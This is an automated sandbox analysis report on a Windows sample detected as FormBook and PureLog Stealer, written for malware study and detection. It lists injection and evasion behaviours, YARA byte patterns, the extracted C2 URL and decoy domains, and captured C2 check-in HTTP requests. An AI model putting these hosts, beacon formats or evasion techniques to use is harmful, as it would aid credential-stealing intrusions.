Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
AB2hQJZ77ipdWem.exe

Overview

General Information

Sample name:AB2hQJZ77ipdWem.exe
Analysis ID:1476627
MD5:f640126d8e76c2a343754ff0f41c1eef
SHA1:b00e9297c74fe4847f4a0667d9cc4379409cb501
SHA256:f9e519cd66cb6bed521306afb703672ef2ed9d82d8341398c4199be4523cad96
Tags:exe
Infos:

Detection

FormBook, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • AB2hQJZ77ipdWem.exe (PID: 7408 cmdline: "C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe" MD5: F640126D8E76C2A343754FF0F41C1EEF)
    • AB2hQJZ77ipdWem.exe (PID: 7576 cmdline: "C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe" MD5: F640126D8E76C2A343754FF0F41C1EEF)
      • explorer.exe (PID: 4084 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • cscript.exe (PID: 7720 cmdline: "C:\Windows\SysWOW64\cscript.exe" MD5: CB601B41D4C8074BE8A84AED564A94DC)
          • cmd.exe (PID: 7760 cmdline: /c del "C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.gtur.top/v15n/"], "decoy": ["dyahwoahjuk.store", "toysstorm.com", "y7rak9.com", "2222233p6.shop", "betbox2341.com", "visualvarta.com", "nijssenadventures.com", "main-12.site", "leng4d.net", "kurainu.xyz", "hatesa.xyz", "culturamosaica.com", "supermallify.store", "gigboard.app", "rxforgive.com", "ameliestones.com", "kapalwin.live", "tier.credit", "sobol-ksa.com", "faredeal.online", "226b.xyz", "talktohannaford500.shop", "mxrkpkngishbdss.xyz", "mirotcg.info", "turbo3club.site", "hjnd28t010cop.cyou", "marveloustep.shop", "syedlatief.com", "comfortableleather.com", "alltradescortland.com", "dnwgt80508yoec8pzq.top", "kedai168ef.com", "gelgoodlife.com", "nxtskey.com", "milliedevine.store", "wordcraftart.fun", "mpo525.monster", "bt365851.com", "dogeversetoken.net", "boostgrowmode.com", "dacapital.net", "project21il.com", "go4stores.com", "brunoduarte.online", "sexgodmasterclass.com", "wuhey.shop", "jdginl892e.xyz", "agenkilat-official.space", "hacks.digital", "suv.xyz", "fwbsmg.life", "vicmvm649n.top", "wbahdfw.icu", "creativelyloud.com", "merrycleanteam.com", "solar-systems-panels-58747.bond", "rotaryclubofmukono.com", "bethanyumcnola.info", "breezafan.com", "ny-robotictoys.com", "lawyers-br-pt-9390663.fyi", "neurasaudi.com", "dgccb.com", "sayuri-walk.com"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1391140026.0000000005A20000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
    00000004.00000002.3839526492.0000000010EC9000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_772cc62dunknownunknown
    • 0xaf2:$a2: pass
    • 0xaf8:$a3: email
    • 0xaff:$a4: login
    • 0xb06:$a5: signin
    • 0xb17:$a6: persistent
    • 0xcea:$r1: C:\Users\user\AppData\Roaming\54904O77\549log.ini
    00000000.00000002.1388307588.000000000315B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          Click to see the 27 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          3.2.AB2hQJZ77ipdWem.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            3.2.AB2hQJZ77ipdWem.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              3.2.AB2hQJZ77ipdWem.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
              • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
              • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
              • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
              • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
              3.2.AB2hQJZ77ipdWem.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
              • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
              • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
              • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
              • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
              • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
              • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
              • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
              • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
              • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
              • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
              • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
              3.2.AB2hQJZ77ipdWem.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
              • 0x18849:$sqlite3step: 68 34 1C 7B E1
              • 0x1895c:$sqlite3step: 68 34 1C 7B E1
              • 0x18878:$sqlite3text: 68 38 2A 90 C5
              • 0x1899d:$sqlite3text: 68 38 2A 90 C5
              • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
              • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
              Click to see the 7 entries

              Sigma Signatures

              No Sigma rule has matched

              Snort Signatures

              Timestamp:07/19/24-10:55:49.050541
              SID:2031412
              Source Port:49439
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/19/24-10:52:45.942774
              SID:2031412
              Source Port:49430
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/19/24-10:54:06.708018
              SID:2031412
              Source Port:49435
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/19/24-10:53:46.666794
              SID:2031412
              Source Port:49434
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/19/24-10:55:29.005476
              SID:2031412
              Source Port:49438
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/19/24-10:54:27.084313
              SID:2031412
              Source Port:49436
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/19/24-10:54:47.510969
              SID:2031412
              Source Port:49437
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/19/24-10:56:09.602206
              SID:2031412
              Source Port:49440
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/19/24-10:53:06.518711
              SID:2031412
              Source Port:49431
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:07/19/24-10:56:32.639578
              SID:2031412
              Source Port:49441
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Suricata Signatures

              Timestamp:2024-07-19T10:54:27.594084+0200
              SID:2031412
              Source Port:49436
              Destination Port:80
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-07-19T10:52:03.353420+0200
              SID:2031412
              Source Port:49438
              Destination Port:80
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-07-19T10:53:07.100331+0200
              SID:2031412
              Source Port:49431
              Destination Port:80
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-07-19T10:52:46.453138+0200
              SID:2031412
              Source Port:49430
              Destination Port:80
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-07-19T10:55:49.562853+0200
              SID:2031412
              Source Port:49439
              Destination Port:80
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-07-19T10:54:07.228817+0200
              SID:2031412
              Source Port:49435
              Destination Port:80
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-07-19T10:56:10.109951+0200
              SID:2031412
              Source Port:49440
              Destination Port:80
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-07-19T10:52:03.353420+0200
              SID:2031412
              Source Port:49437
              Destination Port:80
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-07-19T10:52:03.353420+0200
              SID:2031412
              Source Port:49441
              Destination Port:80
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-07-19T10:53:47.271174+0200
              SID:2031412
              Source Port:49434
              Destination Port:80
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: AB2hQJZ77ipdWem.exeAvira: detected
              Antivirus detection for URL or domain
              Source: http://www.kurainu.xyz/v15n/www.y7rak9.comAvira URL Cloud: Label: malware
              Source: http://www.kurainu.xyzAvira URL Cloud: Label: malware
              Found malware configuration
              Source: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.gtur.top/v15n/"], "decoy": ["dyahwoahjuk.store", "toysstorm.com", "y7rak9.com", "2222233p6.shop", "betbox2341.com", "visualvarta.com", "nijssenadventures.com", "main-12.site", "leng4d.net", "kurainu.xyz", "hatesa.xyz", "culturamosaica.com", "supermallify.store", "gigboard.app", "rxforgive.com", "ameliestones.com", "kapalwin.live", "tier.credit", "sobol-ksa.com", "faredeal.online", "226b.xyz", "talktohannaford500.shop", "mxrkpkngishbdss.xyz", "mirotcg.info", "turbo3club.site", "hjnd28t010cop.cyou", "marveloustep.shop", "syedlatief.com", "comfortableleather.com", "alltradescortland.com", "dnwgt80508yoec8pzq.top", "kedai168ef.com", "gelgoodlife.com", "nxtskey.com", "milliedevine.store", "wordcraftart.fun", "mpo525.monster", "bt365851.com", "dogeversetoken.net", "boostgrowmode.com", "dacapital.net", "project21il.com", "go4stores.com", "brunoduarte.online", "sexgodmasterclass.com", "wuhey.shop", "jdginl892e.xyz", "agenkilat-official.space", "hacks.digital", "suv.xyz", "fwbsmg.life", "vicmvm649n.top", "wbahdfw.icu", "creativelyloud.com", "merrycleanteam.com", "solar-systems-panels-58747.bond", "rotaryclubofmukono.com", "bethanyumcnola.info", "breezafan.com", "ny-robotictoys.com", "lawyers-br-pt-9390663.fyi", "neurasaudi.com", "dgccb.com", "sayuri-walk.com"]}
              Multi AV Scanner detection for submitted file
              Source: AB2hQJZ77ipdWem.exeReversingLabs: Detection: 65%
              Yara detected FormBook
              Source: Yara matchFile source: 3.2.AB2hQJZ77ipdWem.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.AB2hQJZ77ipdWem.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.3820022788.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.3819748664.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.3819260168.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1388754633.0000000004119000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: AB2hQJZ77ipdWem.exeJoe Sandbox ML: detected
              Source: AB2hQJZ77ipdWem.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: AB2hQJZ77ipdWem.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: cscript.pdbUGP source: AB2hQJZ77ipdWem.exe, 00000003.00000002.1453363872.0000000001050000.00000040.10000000.00040000.00000000.sdmp, AB2hQJZ77ipdWem.exe, 00000003.00000002.1453117705.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: AB2hQJZ77ipdWem.exe, 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000005.00000003.1455290372.00000000049B8000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000005.00000003.1453154291.0000000004801000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: AB2hQJZ77ipdWem.exe, AB2hQJZ77ipdWem.exe, 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, cscript.exe, 00000005.00000003.1455290372.00000000049B8000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000005.00000003.1453154291.0000000004801000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: cscript.pdb source: AB2hQJZ77ipdWem.exe, 00000003.00000002.1453363872.0000000001050000.00000040.10000000.00040000.00000000.sdmp, AB2hQJZ77ipdWem.exe, 00000003.00000002.1453117705.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, cscript.exe, 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp
              Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_00632674 GetFileAttributesW,GetLastError,FindFirstFileW,WideCharToMultiByte,GetLastError,__alloca_probe_16,WideCharToMultiByte,GetFileAttributesA,GetLastError,FindFirstFileA,FindClose,5_2_00632674

              Networking

              barindex
              Snort IDS alert for network traffic
              Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49430 -> 209.196.146.115:80
              Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49431 -> 91.195.240.19:80
              Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49434 -> 206.119.184.155:80
              Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49435 -> 170.39.213.118:80
              Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49436 -> 3.64.163.50:80
              Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49437 -> 3.33.130.190:80
              Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49438 -> 104.18.187.223:80
              Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49439 -> 44.227.65.245:80
              Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49440 -> 162.241.244.34:80
              Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.8:49441 -> 206.238.13.219:80
              System process connects to network (likely due to code injection or exploit)
              Source: C:\Windows\explorer.exeNetwork Connect: 91.195.240.19 80Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 209.196.146.115 80Jump to behavior
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: www.gtur.top/v15n/
              Performs DNS queries to domains with low reputation
              Source: DNS query: www.suv.xyz
              Source: DNS query: www.mxrkpkngishbdss.xyz
              Source: global trafficHTTP traffic detected: GET /v15n/?JRv=XrEdp4JX&sr=XUieWyy5h/t2CT62Vq8i5x/kR8G+I8pB2jZaxMIrh4lgqb/JgSc0aR4As1Wt1kkrKMMr HTTP/1.1Host: www.hacks.digitalConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /v15n/?sr=3q+gD+8d2JqJcaFj8j5bP1Jm3mKwB6TbJO3aLoAeIjtgFnwNom6OyZtNSFOdFVlOxo+Q&JRv=XrEdp4JX HTTP/1.1Host: www.creativelyloud.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /v15n/?sr=3ADokGHGfx6TKsz50QsuRVYX3rGFBDL5q/42DkYvURdCZMVWG44MA4Ku4Cx/hAPmB3dD&JRv=XrEdp4JX HTTP/1.1Host: www.y7rak9.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /v15n/?JRv=XrEdp4JX&sr=90AMgQB2NDTL00GN4iM7gX4woUZ3upfO9yCtQrIdbfLXDlf/PtDiDRZV6/VBSbbmWq2J HTTP/1.1Host: www.wordcraftart.funConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /v15n/?sr=vAzU6JYnADLUgEemxRzkUQMY3qynAzl+X72N7mZcinpf+VhfhGS/tUhrfESL21IfICFO&JRv=XrEdp4JX HTTP/1.1Host: www.suv.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /v15n/?JRv=XrEdp4JX&sr=eKJokfhRlZ6TJn38gns6VD6cymqx2Da3HErd8WBjDQDJ0kZiIGavcwgaXT3T04xjS0au HTTP/1.1Host: www.mirotcg.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: Joe Sandbox ViewIP Address: 3.64.163.50 3.64.163.50
              Source: Joe Sandbox ViewIP Address: 91.195.240.19 91.195.240.19
              Source: Joe Sandbox ViewASN Name: PETRONAS-BHD-AS-APPetroliamNasionalBerhadMY PETRONAS-BHD-AS-APPetroliamNasionalBerhadMY
              Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
              Source: Joe Sandbox ViewASN Name: SEDO-ASDE SEDO-ASDE
              Source: Joe Sandbox ViewASN Name: COGECO-PEER1CA COGECO-PEER1CA
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Windows\explorer.exeCode function: 4_2_10EB1F82 getaddrinfo,setsockopt,recv,4_2_10EB1F82
              Source: global trafficHTTP traffic detected: GET /v15n/?JRv=XrEdp4JX&sr=XUieWyy5h/t2CT62Vq8i5x/kR8G+I8pB2jZaxMIrh4lgqb/JgSc0aR4As1Wt1kkrKMMr HTTP/1.1Host: www.hacks.digitalConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /v15n/?sr=3q+gD+8d2JqJcaFj8j5bP1Jm3mKwB6TbJO3aLoAeIjtgFnwNom6OyZtNSFOdFVlOxo+Q&JRv=XrEdp4JX HTTP/1.1Host: www.creativelyloud.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /v15n/?sr=3ADokGHGfx6TKsz50QsuRVYX3rGFBDL5q/42DkYvURdCZMVWG44MA4Ku4Cx/hAPmB3dD&JRv=XrEdp4JX HTTP/1.1Host: www.y7rak9.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /v15n/?JRv=XrEdp4JX&sr=90AMgQB2NDTL00GN4iM7gX4woUZ3upfO9yCtQrIdbfLXDlf/PtDiDRZV6/VBSbbmWq2J HTTP/1.1Host: www.wordcraftart.funConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /v15n/?sr=vAzU6JYnADLUgEemxRzkUQMY3qynAzl+X72N7mZcinpf+VhfhGS/tUhrfESL21IfICFO&JRv=XrEdp4JX HTTP/1.1Host: www.suv.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: GET /v15n/?JRv=XrEdp4JX&sr=eKJokfhRlZ6TJn38gns6VD6cymqx2Da3HErd8WBjDQDJ0kZiIGavcwgaXT3T04xjS0au HTTP/1.1Host: www.mirotcg.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficDNS traffic detected: DNS query: www.hacks.digital
              Source: global trafficDNS traffic detected: DNS query: www.creativelyloud.com
              Source: global trafficDNS traffic detected: DNS query: www.y7rak9.com
              Source: global trafficDNS traffic detected: DNS query: www.wordcraftart.fun
              Source: global trafficDNS traffic detected: DNS query: www.suv.xyz
              Source: global trafficDNS traffic detected: DNS query: www.mirotcg.info
              Source: global trafficDNS traffic detected: DNS query: www.mxrkpkngishbdss.xyz
              Source: global trafficDNS traffic detected: DNS query: www.lawyers-br-pt-9390663.fyi
              Source: global trafficDNS traffic detected: DNS query: www.boostgrowmode.com
              Source: global trafficDNS traffic detected: DNS query: www.syedlatief.com
              Source: global trafficDNS traffic detected: DNS query: www.gtur.top
              Source: explorer.exe, 00000004.00000003.2287668154.000000000927A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1397007516.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3827556743.000000000927B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1397007516.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3076522967.000000000927B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: explorer.exe, 00000004.00000003.2287668154.000000000927A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1397007516.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3827556743.000000000927B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1397007516.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3076522967.000000000927B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: explorer.exe, 00000004.00000002.3827556743.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2287668154.000000000927A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1397007516.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3827556743.000000000927B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1397007516.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1397007516.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3076522967.000000000927B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3076522967.0000000009237000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: explorer.exe, 00000004.00000002.3822791120.0000000004405000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1392124977.0000000004405000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ns.adobeS
              Source: explorer.exe, 00000004.00000003.2287668154.000000000927A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1397007516.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3827556743.000000000927B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1397007516.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3076522967.000000000927B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: explorer.exe, 00000004.00000002.3826801349.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1397007516.00000000090DA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
              Source: explorer.exe, 00000004.00000000.1391014602.0000000002C80000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.3825259547.0000000007720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.1394973187.0000000007710000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
              Source: explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.boostgrowmode.com
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.boostgrowmode.com/v15n/
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.boostgrowmode.com/v15n/www.syedlatief.com
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.boostgrowmode.comReferer:
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.brunoduarte.online
              Source: explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.brunoduarte.online/v15n/
